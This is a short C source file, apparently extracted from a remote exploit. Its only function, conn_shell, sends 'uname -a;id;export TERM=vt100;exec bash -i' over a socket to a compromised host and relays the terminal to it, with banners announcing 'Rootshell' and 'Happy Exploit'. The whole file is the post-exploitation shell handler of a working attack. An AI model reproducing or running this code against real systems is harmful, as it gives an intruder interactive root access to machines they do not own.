
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;


 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int STDIN_FILENO ;
 int exit (int ) ;
 int fflush (int ) ;
 int fprintf (int ,char*) ;
 int memset (char*,int ,int) ;
 int printf (char*,char*) ;
 int read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int send (int,char*,int ,int ) ;
 int stdout ;
 int strlen (char*) ;
 int write (int,char*,int) ;

void conn_shell(int sock)
{
 int pckt;
 char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n";
 char rbuf[1024];
 fd_set rset;
 memset((char *)rbuf,0,1024);

 fprintf(stdout," #\n # Kill two bird with one stone!\n");
 fprintf(stdout," # OK, It's Rootshell\n #\n\n");
 send(sock,cmd,strlen(cmd),0);

 while(1)
 {
  fflush(stdout);
  FD_ZERO(&rset);
  FD_SET(sock,&rset);
  FD_SET(STDIN_FILENO,&rset);
  select(sock+1,&rset,((void*)0),((void*)0),((void*)0));

  if(FD_ISSET(sock,&rset))
  {
   pckt=read(sock,rbuf,1024);
   if(pckt<=0)
   {
    fprintf(stdout," #\n # Happy Exploit !\n #\n\n");
    exit(0);
   }
   rbuf[pckt]=0;
   printf("%s",rbuf);
  }
  if(FD_ISSET(STDIN_FILENO,&rset))
  {
   pckt=read(STDIN_FILENO,rbuf,1024);
   if(pckt>0)
   {
    rbuf[pckt]=0;
    write(sock,rbuf,pckt);
   }
  }
 }
 return;
}
